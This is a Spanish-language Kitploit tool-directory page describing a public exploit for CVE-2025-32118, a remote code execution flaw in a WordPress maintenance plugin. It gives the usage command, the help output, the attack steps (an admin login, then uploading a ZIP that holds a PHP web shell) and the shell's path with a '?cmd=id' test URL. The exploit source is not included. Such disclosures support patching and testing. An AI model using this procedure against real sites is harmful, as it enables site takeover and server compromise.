Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32118 — WordPress CMP – Complemento Coming Soon & Maintenance <= 4.1.13 - Vulnerabilidad de ejecución remota de código (RCE) | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-32118
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-32118

CVE-2025-32118

WordPress CMP – Complemento Coming Soon & Maintenance <= 4.1.13 - Vulnerabilidad de ejecución remota de código (RCE)

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚀 CVE-2025-32118 - Exploit RCE del Plugin CMP de WordPress

🔍 Título: WordPress CMP – Coming Soon & Maintenance plugin <= 4.1.13 - Ejecución Remota de Código (RCE)
🗓️ Publicado: 2025-04-04
🔐 CWE: CWE-434 - Carga sin restricciones de archivos de tipo peligroso
📊 CVSS: 9.1 (CRÍTICO) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H


📜 Descripción

Existe una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en el plugin CMP – Coming Soon & Maintenance para WordPress (<= 4.1.13).
Este fallo permite que un usuario administrador autenticado suba archivos ZIP maliciosos que contienen shells PHP ejecutables, lo que lleva al compromiso total del sitio.


💥 Impacto

  • Subida de código PHP arbitrario dentro del directorio del plugin
  • Ejecución sin restricciones de comandos del sistema a través de una web shell
  • Posible toma completa del servidor

⚙️ Requisitos

  • Sitio WordPress con el plugin CMP vulnerable instalado (<= 4.1.13)
  • Credenciales válidas de administrador de WordPress (Autenticación requerida)

💻 Uso

root@kitploit:~
python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password

✍️ Uso (Salida de ayuda de la CLI)

root@kitploit:~
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME   Admin username
  -p, --password PASSWORD    Admin password

📌 Argumentos:

FlagDescripción
-uURL base del sitio WordPress
-unnombre de usuario
-pcontraseña

🧪 ¿Qué hace?

  1. Se autentica en el panel de administración de WordPress.
  2. Obtiene un nonce válido para la solicitud de subida.
  3. Crea un ZIP malicioso con:
    • style.css (formato de tema válido)
    • nxploitedshell.php (carga útil RCE)
  4. Sube el ZIP usando la funcionalidad vulnerable de subida de temas.
  5. Verifica la shell ejecutando ?cmd=whoami.

📂 Ubicación de la shell

Una vez subida con éxito, la shell se ubicará en:

root@kitploit:~
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php

Pruébalo mediante:

root@kitploit:~
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id

❗ Aviso legal

Este exploit es solo con fines educativos.
El uso no autorizado de este código en sistemas que no posees es ilegal y poco ético.


🔗 Referencias

  • CVE-2025-32118 en MITRE
  • CWE-434: https://cwe.mitre.org/data/definitions/434.html

✒️ Por:

Nxploited | Khaled Alenazi

Descargar herramienta